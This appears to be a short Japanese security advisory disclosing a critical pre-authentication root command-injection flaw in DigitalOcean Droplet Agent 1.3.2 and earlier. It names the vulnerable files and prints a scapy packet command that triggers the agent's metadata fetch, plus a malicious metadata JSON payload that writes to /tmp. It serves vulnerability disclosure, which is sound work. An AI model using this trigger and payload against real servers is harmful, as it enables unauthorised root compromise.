
# DigitalOcean Droplet Agent v1.3.2以前における認証前の重大なRoot RCE(CVSS 10.0)— コマンドインジェクション経由
DigitalOcean Droplet Agent v1.3.2 以前における、認証前の重大なルート権限 RCE(CVSS 10.0)を、コマンドインジェクションにより引き起こす脆弱性。
DigitalOcean Droplet Agent(1.3.2 以前の全バージョン)において、重大なコマンドインジェクションの脆弱性が発見されました。この欠陥により、攻撃者は認証なしでルート権限による**リモートコード実行(RCE)**を達成できます。
発見者: Anmol Singh Rajput(@pox_sky_01)- Cortex Security Research
この脆弱性は、トラブルシューティングのアクショナーコンポーネントに存在します:
internal/troubleshooting/actioner/actioner.gointernal/troubleshooting/command/exec.goエージェントはローカルサービス(169.254.169.254)からのメタデータを処理し、TroubleshootingAgent.Requesting 配列からのコマンドを適切なサニタイズなしで実行します。
エージェントは、ポート 22 への特定の TCP パケットによってトリガーされます:
フェッチのトリガー:
python3 -c "from scapy.all import *; send(IP(dst='TARGET')/TCP(dport=22,flags='S',seq=68796879,ack=848489))"
悪意のあるメタデータペイロード:
{
"troubleshooting_agent": {
"requesting": ["command:id > /tmp/pwned"]
}
}
影響 CVSS スコア: 10.0(Critical)
必要な権限: なし
結果: システム全体の完全な侵害(ルートアクセス)
